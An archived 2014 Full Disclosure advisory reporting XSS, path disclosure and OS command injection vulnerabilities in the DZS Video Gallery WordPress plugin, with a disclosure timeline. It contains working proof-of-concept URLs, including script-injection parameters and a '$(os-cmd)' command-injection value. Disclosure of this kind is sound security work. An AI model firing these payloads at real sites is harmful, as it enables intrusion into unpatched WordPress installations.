| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <005f01cf9edd$27ad17d0$9b7a6fd5@pc> Date: Sun, 13 Jul 2014 23:57:24 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] XSS, FPD and RCE vulnerabilities in DZS Video Gallery for WordPress Hello list! These are Cross-Site Scripting, Full path disclosure and OS Commanding vulnerabilities in plugin DZS Video Gallery for WordPress. Earlier I've disclosed Content Spoofing and Cross-Site Scripting vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html). ------------------------- Affected products: ------------------------- Vulnerable are all versions of DZS Video Gallery for WordPress. ------------------------- Affected vendors: ------------------------- Digital Zoom Studio http://digitalzoomstudio.net ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Full path disclosure (WASC-13): http://site/wp-content/plugins/dzs-videogallery/videogallery.php http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php FPD in php-files of the plugin (by default) or in error_log - in all folders of the plugin. The files vary depending on version of the plugin. OS Commanding (WASC-31): http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd) RCE using method of Pichaya Morimoto (http://seclists.org/fulldisclosure/2014/Jun/117). ------------ Timeline: ------------ 2014.05.08 - announced at my site. 2014.05.09 - informed developer, but he ignored. 2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists